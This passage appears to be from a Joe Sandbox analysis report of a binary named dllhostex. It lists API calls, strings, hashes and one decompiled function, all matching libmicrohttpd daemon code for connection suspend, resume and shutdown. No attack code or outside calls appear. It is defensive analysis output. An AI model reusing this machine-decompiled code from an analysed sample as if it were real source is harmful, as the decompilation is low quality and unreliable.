                                                • shutdown.WS2_32(?,00000002), ref: 0134D20C
                                                • send.WS2_32(?,013CDD84,00000001,00000000), ref: 0134D232
                                                • WSAGetLastError.WS2_32 ref: 0134D23C
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134D286
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0134D28D
                                                • CloseHandle.KERNEL32(?), ref: 0134D29E
                                                • EnterCriticalSection.KERNEL32(?), ref: 0134D2A7
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134D337
                                                  • Part of subcall function 0134A8B0: EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • send.WS2_32(?,013CDAEC,00000001,00000000), ref: 0134D478
                                                • WSAGetLastError.WS2_32 ref: 0134D482
                                                Strings
                                                • 1 < daemon->worker_pool_size, xrefs: 0134D6DB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D6E5
                                                • MHD_stop_daemon() called while we have suspended connections., xrefs: 0134D2B9
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D6EA
                                                • Failed to signal shutdown via inter-thread communication channel, xrefs: 0134D2FF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D50E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D527
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D2EB
                                                • MHD_stop_daemon() called while we have suspended connections., xrefs: 0134D2E1
                                                • Failed to join a thread, xrefs: 0134D391
                                                • Failed to join a thread, xrefs: 0134D3AF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D39B
                                                • Initiated daemon shutdown while "upgraded" connection was not closed., xrefs: 0134D1C4
                                                • MHD_INVALID_SOCKET != fd, xrefs: 0134D518
                                                • Failed to signal shutdown via inter-thread communication channel., xrefs: 0134D48F
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D43D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D2C3
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D3B9
                                                • MHD_ITC_IS_INVALID_(daemon->itc), xrefs: 0134D4FF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D438
                                                • 0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD), xrefs: 0134D42E
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D499
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D696
                                                • Close socket failed., xrefs: 0134D68C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D509
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D309
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D522
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Enter$ErrorLastLeavesend$CloseHandleObjectSingleWaitshutdown
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)$1 < daemon->worker_pool_size$Close socket failed.$Failed to join a thread$Failed to join a thread$Failed to signal shutdown via inter-thread communication channel$Failed to signal shutdown via inter-thread communication channel.$Initiated daemon shutdown while "upgraded" connection was not closed.$MHD_INVALID_SOCKET != fd$MHD_ITC_IS_INVALID_(daemon->itc)$MHD_stop_daemon() called while we have suspended connections.$MHD_stop_daemon() called while we have suspended connections.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 1990226287-3708895456
                                                • Opcode ID: 9fd66b52c0bcdf4b5b24171f63a401cc500ed76a66c50513850777130d082221
                                                • Instruction ID: 3e31dfa6d0d2b33fd9a2a8747040f120bbd123dd1d4d7b2b6dfd2ef9bb203f43
                                                • Opcode Fuzzy Hash: 9fd66b52c0bcdf4b5b24171f63a401cc500ed76a66c50513850777130d082221
                                                • Instruction Fuzzy Hash: 8CC1F4307407019BF7319BB8DC45FA6BBE9AB60B1CF08452DF96A57291DB71F8008B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134A8B0 Relevance: 59.7, APIs: 6, Strings: 28, Instructions: 244networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • GetTickCount64.KERNEL32 ref: 0134AA02
                                                • __aulldiv.LIBCMT ref: 0134AA1D
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134AAFC
                                                • send.WS2_32(?,013CEF9C,00000001,00000000), ref: 0134AB1C
                                                • WSAGetLastError.WS2_32 ref: 0134AB26
                                                Strings
                                                • Failed to signal resume of connection via inter-thread communication channel., xrefs: 0134AB33
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB8C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABF5
                                                • (NULL != prev) || (daemon->shutdown), xrefs: 0134A900
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB9D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABE4
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB55
                                                • NULL == (pos)->prevX, xrefs: 0134AB7D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB73
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABB8
                                                • pos->suspended, xrefs: 0134ABD5
                                                • NULL == (pos)->prevX, xrefs: 0134ABA9
                                                • NULL == (pos)->nextX, xrefs: 0134ABBF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABC9
                                                • (NULL != (pos)->next) || ((pos) == (daemon->suspended_connections_tail)), xrefs: 0134AB4B
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB6E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABFA
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A90F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A90A
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->suspended_connections_head)), xrefs: 0134AB64
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AB87
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABCE
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABDF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AB5A
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134ABB3
                                                • NULL == daemon->worker_pool, xrefs: 0134ABEB
                                                • NULL == (pos)->nextX, xrefs: 0134AB93
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134ABA2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Count64EnterErrorLastLeaveTick__aulldivsend
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->suspended_connections_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->suspended_connections_head))$(NULL != prev) || (daemon->shutdown)$Failed to signal resume of connection via inter-thread communication channel.$NULL == (pos)->nextX$NULL == (pos)->nextX$NULL == (pos)->prevX$NULL == (pos)->prevX$NULL == daemon->worker_pool$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$pos->suspended
                                                • API String ID: 2435418420-3733651401
                                                • Opcode ID: fcf3f530ca254efac778ab6b2c4a20cf79a56a11e396336898a4e783170a091e
                                                • Instruction ID: 1580821a58deccb075860ec2f548df4040367bfd96748de293493ef0371577ab
                                                • Opcode Fuzzy Hash: fcf3f530ca254efac778ab6b2c4a20cf79a56a11e396336898a4e783170a091e
                                                • Instruction Fuzzy Hash: 8C918074A84706AFE721DF29C845F12BBE9BB14B0CF04852EE54B97B42D3B0B494CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134A600 Relevance: 54.4, APIs: 7, Strings: 24, Instructions: 194networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(0000009C,?,00000000,00000000,0134D9C2), ref: 0134A60F
                                                • LeaveCriticalSection.KERNEL32(0000009C), ref: 0134A626
                                                • EnterCriticalSection.KERNEL32(0000009C,?), ref: 0134A849
                                                • LeaveCriticalSection.KERNEL32(0000009C), ref: 0134A85E
                                                • send.WS2_32(?,013CF22C,00000001,00000000), ref: 0134A87D
                                                • WSAGetLastError.WS2_32 ref: 0134A887
                                                Strings
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A798
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A82D
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A6C0
                                                • (NULL != (connection)->prev) || ((connection) == (daemon->connections_head)), xrefs: 0134A747
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A687
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A6E0
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A79D
                                                • ! connection->suspended, xrefs: 0134A78E
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->manual_timeout_tail)), xrefs: 0134A6B1
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->manual_timeout_head)), xrefs: 0134A6D6
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head)), xrefs: 0134A678
                                                • Failed to signal resume via inter-thread communication channel., xrefs: 0134A894
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A731
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A6E5
                                                • Cannot resume connections without enabling MHD_ALLOW_SUSPEND_RESUME!, xrefs: 0134A823
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A756
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail)), xrefs: 0134A7CF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134A7DE
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A6BB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A751
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A682
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A72C
                                                • (NULL != (connection)->next) || ((connection) == (daemon->connections_tail)), xrefs: 0134A722
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134A7D9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ErrorLastsend
                                                • String ID: ! connection->suspended$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (connection)->next) || ((connection) == (daemon->connections_tail))$(NULL != (connection)->nextX) || ((connection) == (daemon->manual_timeout_tail))$(NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail))$(NULL != (connection)->prev) || ((connection) == (daemon->connections_head))$(NULL != (connection)->prevX) || ((connection) == (daemon->manual_timeout_head))$(NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head))$Cannot resume connections without enabling MHD_ALLOW_SUSPEND_RESUME!$Failed to signal resume via inter-thread communication channel.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 3480985631-1784498497
                                                • Opcode ID: fdc69cdcf7a1186c44a43480106fe05c8538b267236583b5fb4915c7122bee84
                                                • Instruction ID: 86c8f9dd3f825c41a8c676a05823bfbb1d67d27e16dafd90287cc11438a7ef18
                                                • Opcode Fuzzy Hash: fdc69cdcf7a1186c44a43480106fe05c8538b267236583b5fb4915c7122bee84
                                                • Instruction Fuzzy Hash: EC71BE70780702AFE724DB6AC845F96BBF9BB04B1DF00851DE55BA7642D3B4B850CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134BE20 Relevance: 51.0, APIs: 5, Strings: 24, Instructions: 204threadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 42%
                                                			E0134BE20(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
				intOrPtr _v8;
				void* __esi;
				void* __ebp;
				long _t68;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t81;
				struct _CRITICAL_SECTION* _t83;
				intOrPtr* _t87;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t99;
				intOrPtr _t100;

				_t87 = __ecx;
				_t61 = __eax;
				_t99 = __ecx;
				_t94 =  *((intOrPtr*)(__ecx + 0x10));
				if(( *(_t94 + 0xe4) & 0x00000004) == 0) {
					_t92 = 3;
					E0134DD20(__ecx, 3);
					_t11 = _t94 + 0x9c; // 0x9c
					_t83 = _t11;
					EnterCriticalSection(_t83);
					if( *((char*)(_t99 + 0xdc)) != 0) {
						_push("! pos->suspended");
						_push(0x1123);
						_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
						_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
						goto L45;
					} else {
						if( *((char*)(_t99 + 0xe4)) == 0) {
							_t92 =  *((intOrPtr*)(_t99 + 0x10));
							_t87 =  *((intOrPtr*)(_t99 + 8));
							if( *((intOrPtr*)(_t99 + 0x90)) !=  *((intOrPtr*)(_t92 + 0xd8)) ||  *((intOrPtr*)(_t99 + 0x94)) !=  *((intOrPtr*)(_t92 + 0xdc))) {
								if(_t87 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0x2c))) {
									_t75 =  *((intOrPtr*)(_t99 + 0xc));
									if(_t75 != 0) {
										 *((intOrPtr*)(_t75 + 8)) = _t87;
										goto L26;
									} else {
										if(_t99 ==  *((intOrPtr*)(_t94 + 0x28))) {
											 *((intOrPtr*)(_t94 + 0x28)) = _t87;
											L26:
											_t87 =  *((intOrPtr*)(_t99 + 8));
											_t76 =  *((intOrPtr*)(_t99 + 0xc));
											if(_t87 != 0) {
												goto L28;
											} else {
												 *((intOrPtr*)(_t94 + 0x2c)) = _t76;
											}
											goto L29;
										} else {
											_push("(NULL != (pos)->prevX) || ((pos) == (daemon->manual_timeout_head))");
											_push(0x112c);
											_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
											_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
											goto L45;
										}
									}
								} else {
									_push("(NULL != (pos)->nextX) || ((pos) == (daemon->manual_timeout_tail))");
									_push(0x112c);
									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
									goto L45;
								}
							} else {
								if(_t87 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0x24))) {
									_t81 =  *((intOrPtr*)(_t99 + 0xc));
									if(_t81 != 0) {
										 *((intOrPtr*)(_t81 + 8)) = _t87;
										goto L16;
									} else {
										if(_t99 ==  *((intOrPtr*)(_t94 + 0x20))) {
											 *((intOrPtr*)(_t94 + 0x20)) = _t87;
											L16:
											_t87 =  *((intOrPtr*)(_t99 + 8));
											_t76 =  *((intOrPtr*)(_t99 + 0xc));
											if(_t87 != 0) {
												L28:
												 *((intOrPtr*)(_t87 + 0xc)) = _t76;
											} else {
												 *((intOrPtr*)(_t94 + 0x24)) = _t76;
											}
											L29:
											 *((intOrPtr*)(_t99 + 8)) = 0;
											 *((intOrPtr*)(_t99 + 0xc)) = 0;
											_t77 =  *_t99;
											if(_t77 != 0 || _t99 ==  *((intOrPtr*)(_t94 + 0xc))) {
												_t87 =  *((intOrPtr*)(_t99 + 4));
												if(_t87 != 0) {
													 *_t87 = _t77;
													goto L37;
												} else {
													if(_t99 ==  *((intOrPtr*)(_t94 + 8))) {
														 *((intOrPtr*)(_t94 + 8)) = _t77;
														L37:
														_t91 =  *_t99;
														_t78 =  *((intOrPtr*)(_t99 + 4));
														if(_t91 != 0) {
															 *((intOrPtr*)(_t91 + 4)) = _t78;
														} else {
															 *((intOrPtr*)(_t94 + 0xc)) = _t78;
														}
														 *_t99 = 0;
														 *((intOrPtr*)(_t99 + 4)) = 0;
														_t79 =  *((intOrPtr*)(_t94 + 0x18));
														 *_t99 = _t79;
														if( *((intOrPtr*)(_t94 + 0x1c)) != 0) {
															_t61 =  *((intOrPtr*)(_t94 + 0x18));
															 *((intOrPtr*)(_t61 + 4)) = _t99;
															 *((intOrPtr*)(_t94 + 0x18)) = _t99;
															LeaveCriticalSection(_t83);
															goto L43;
														} else {
															 *((intOrPtr*)(_t94 + 0x1c)) = _t99;
															 *((intOrPtr*)(_t94 + 0x18)) = _t99;
															LeaveCriticalSection(_t83);
															return _t79;
														}
													} else {
														_push("(NULL != (pos)->prev) || ((pos) == (daemon->connections_head))");
														_push(0x112f);
														_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
														_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
														goto L45;
													}
												}
											} else {
												_push("(NULL != (pos)->next) || ((pos) == (daemon->connections_tail))");
												_push(0x112f);
												_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
												_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
												goto L45;
											}
										} else {
											_push("(NULL != (pos)->prevX) || ((pos) == (daemon->normal_timeout_head))");
											_push(0x1128);
											_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
											_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
											goto L45;
										}
									}
								} else {
									_push("(NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail))");
									_push(0x1128);
									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
									goto L45;
								}
							}
						} else {
							_push("! pos->resuming");
							_push(0x1124);
							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
							L45:
							_push(E0135B8FA(2));
							E012938B0(_t87);
							E0135D32E(_t87, E0135B8FA(2));
							E0135EBB9(_t83, _t87, _t92, _t94, _t99);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t87);
							_push(_t99);
							_t68 = GetCurrentThreadId();
							_t100 = _v8;
							 *(_t100 + 0x80) = _t68;
							while( *((char*)(_t100 + 0xc4)) == 0) {
								_t92 = 1;
								_t89 = _t100;
								if(( *(_t100 + 0xe4) & 0x00000040) == 0) {
									E0134B300(_t83, _t89, 1, _t94);
								} else {
									E0134BCD0(_t89, 1);
								}
								E0134AE20(_t100);
							}
							E0134D150(_t83, _t100, _t92, _t94);
							return 0;
						}
					}
				} else {
					 *((intOrPtr*)(__ecx + 0xac)) = 0x13;
					 *((intOrPtr*)(__ecx + 0xb0)) = 3;
					if(( *(_t94 + 0xe4) & 0x00001000) != 0) {
						L43:
						return _t61;
					} else {
						__imp__#22( *((intOrPtr*)(__ecx + 0xa0)), 1);
						return __eax;
					}
				}
			}




















                                                0x0134be20
                                                0x0134be20
                                                0x0134be22
                                                0x0134be25
                                                0x0134be32
                                                0x0134be6a
                                                0x0134be6f
                                                0x0134be74
                                                0x0134be74
                                                0x0134be7b
                                                0x0134be88
                                                0x0134c03a
                                                0x0134c03f
                                                0x0134c044
                                                0x0134c049
                                                0x00000000
                                                0x0134be8e
                                                0x0134be95
                                                0x0134beb0
                                                0x0134beb9
                                                0x0134bec2
                                                0x0134bf32
                                                0x0134bf52
                                                0x0134bf57
                                                0x0134bf7c
                                                0x00000000
                                                0x0134bf59
                                                0x0134bf5c
                                                0x0134bf77
                                                0x0134bf7f
                                                0x0134bf7f
                                                0x0134bf82
                                                0x0134bf87
                                                0x00000000
                                                0x0134bf89
                                                0x0134bf89
                                                0x0134bf89
                                                0x00000000
                                                0x0134bf5e
                                                0x0134bf5e
                                                0x0134bf63
                                                0x0134bf68
                                                0x0134bf6d
                                                0x00000000
                                                0x0134bf6d
                                                0x0134bf5c
                                                0x0134bf39
                                                0x0134bf39
                                                0x0134bf3e
                                                0x0134bf43
                                                0x0134bf48
                                                0x00000000
                                                0x0134bf48
                                                0x0134bed2
                                                0x0134bed4
                                                0x0134bef4
                                                0x0134bef9
                                                0x0134bf1e
                                                0x00000000
                                                0x0134befb
                                                0x0134befe
                                                0x0134bf19
                                                0x0134bf21
                                                0x0134bf21
                                                0x0134bf24
                                                0x0134bf29
                                                0x0134bf8e
                                                0x0134bf8e
                                                0x0134bf2b
                                                0x0134bf2b
                                                0x0134bf2b
                                                0x0134bf91
                                                0x0134bf91
                                                0x0134bf98
                                                0x0134bf9f
                                                0x0134bfa3
                                                0x0134bfc3
                                                0x0134bfc8
                                                0x0134bfea
                                                0x00000000
                                                0x0134bfca
                                                0x0134bfcd
                                                0x0134bfe5
                                                0x0134bfec
                                                0x0134bfec
                                                0x0134bfee
                                                0x0134bff3
                                                0x0134bffa
                                                0x0134bff5
                                                0x0134bff5
                                                0x0134bff5
                                                0x0134bffd
                                                0x0134c003
                                                0x0134c00a
                                                0x0134c00d
                                                0x0134c013
                                                0x0134c026
                                                0x0134c02a
                                                0x0134c02d
                                                0x0134c030
                                                0x00000000
                                                0x0134c015
                                                0x0134c016
                                                0x0134c019
                                                0x0134c01c
                                                0x0134c025
                                                0x0134c025
                                                0x0134bfcf
                                                0x0134bfcf
                                                0x0134bfd4
                                                0x0134bfd9
                                                0x0134bfde
                                                0x00000000
                                                0x0134bfde
                                                0x0134bfcd
                                                0x0134bfaa
                                                0x0134bfaa
                                                0x0134bfaf
                                                0x0134bfb4
                                                0x0134bfb9
                                                0x00000000
                                                0x0134bfb9
                                                0x0134bf00
                                                0x0134bf00
                                                0x0134bf05
                                                0x0134bf0a
                                                0x0134bf0f
                                                0x00000000
                                                0x0134bf0f
                                                0x0134befe
                                                0x0134bedb
                                                0x0134bedb
                                                0x0134bee0
                                                0x0134bee5
                                                0x0134beea
                                                0x00000000
                                                0x0134beea
                                                0x0134bed4
                                                0x0134be97
                                                0x0134be97
                                                0x0134be9c
                                                0x0134bea1
                                                0x0134bea6
                                                0x0134c04e
                                                0x0134c058
                                                0x0134c059
                                                0x0134c06c
                                                0x0134c074
                                                0x0134c079
                                                0x0134c07a
                                                0x0134c07b
                                                0x0134c07c
                                                0x0134c07d
                                                0x0134c07e
                                                0x0134c07f
                                                0x0134c086
                                                0x0134c087
                                                0x0134c088
                                                0x0134c08e
                                                0x0134c098
                                                0x0134c09e
                                                0x0134c0aa
                                                0x0134c0af
                                                0x0134c0b1
                                                0x0134c0ba
                                                0x0134c0b3
                                                0x0134c0b3
                                                0x0134c0b3
                                                0x0134c0c1
                                                0x0134c0c6
                                                0x0134c0d1
                                                0x0134c0dc
                                                0x0134c0dc
                                                0x0134be95
                                                0x0134be34
                                                0x0134be34
                                                0x0134be3e
                                                0x0134be52
                                                0x0134c036
                                                0x0134c039
                                                0x0134be58
                                                0x0134be60
                                                0x0134be69
                                                0x0134be69
                                                0x0134be52

                                                APIs
                                                • shutdown.WS2_32(?,00000001), ref: 0134BE60
                                                • EnterCriticalSection.KERNEL32(0000009C,?,?,770EEB70,0134D37C), ref: 0134BE7B
                                                • GetCurrentThreadId.KERNEL32 ref: 0134C088
                                                Strings
                                                • (NULL != (pos)->nextX) || ((pos) == (daemon->normal_timeout_tail)), xrefs: 0134BEDB
